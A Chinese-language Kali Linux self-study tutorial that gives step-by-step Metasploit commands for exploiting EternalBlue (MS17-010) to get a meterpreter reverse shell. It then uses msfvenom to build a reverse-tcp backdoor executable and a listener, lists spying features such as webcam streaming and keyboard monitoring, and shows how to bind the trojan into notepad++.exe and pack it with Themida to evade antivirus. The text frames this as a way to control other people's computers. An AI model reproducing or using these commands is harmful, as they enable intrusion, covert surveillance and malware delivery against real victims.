kali自学教程1.msf攻击永恒之蓝及后门木马植入

msf使用

msf攻击永恒之蓝利用2017年之前windows版本的漏洞，445端口。win10 11没有此漏洞。
完整命令：
sudo su
msfconsole
search ms17_010
use 0
set RHOSTS 192.168.186.131 //要攻击的目标ip
set lport 60000 //kali的监听端口
run

进入meterpreter，这是msf在攻击完成后得到目标受害机器的渗透权限（即攻击成功）
总结：metasploit攻击永恒之蓝全流程
1、使用模块
use exploit/windows/smb/ms17_010_eternablue
2、设置必选项
查看必选项【*required为yes的就是必选项】
show options
set RHOSTS 192.168.186.131
set payload windows/x64/meterpreter/reverse_tcp
[*payload是攻击载荷，就是攻击完成后想干啥，这里是想获取meterpreter]
[meterpreter是metasploit后渗透的神器]
set LHOST 192.168.186.128【kali的ip】
set LPORT 60000 [kali上要开的端口，1-65535随便选，但是不能被占用]
3、运行模块，完成攻击
run

木马植入以及远程监听

win7 和 永恒之蓝不是每台电脑都有。想远程控制别人？msfvenom生成远控木马了解一下
msfvenmon是用来生成后门的软件，在目标机上执行后门，在本地监听上线。【msfvenom在shell里使用，不是msfconsole终端】
windows可执行程序后门：
sudo su
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.186.128 lport=9999 -f exe -o demo.exe

注：-p: paylod
payload_name：系统/架构/作用/方式
payload设置
-f ：format
exe：windows可执行文件
-o：代表输出为demo.exe文件
把生成的demo.exe文件放进想攻击的靶机中运行

接下来开启监听：
msfconsole
search ms17_010
use 0
use exploit/mutil/handler //使用模块
show options【填写payload LHOST LPORT】
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.186.128
set lport 9999
run
等靶机点开demo.exe文件，鱼就上钩了
进入meterpreter 可以在help查看命令，如打开摄像头，监控鼠标键盘，等等
webcam_stream打开摄像头

远控木马免杀过火绒

kali: 捆绑木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.186.128 lport=9999 -f exe -x notepad++.exe -o notepad++_miansha.exe
-x: 指的是待绑定的正常软件
注意要用x64位的。32位的会失效。32位的应用程序没办法植入64的木马

利用windows上的Themida工具进行加壳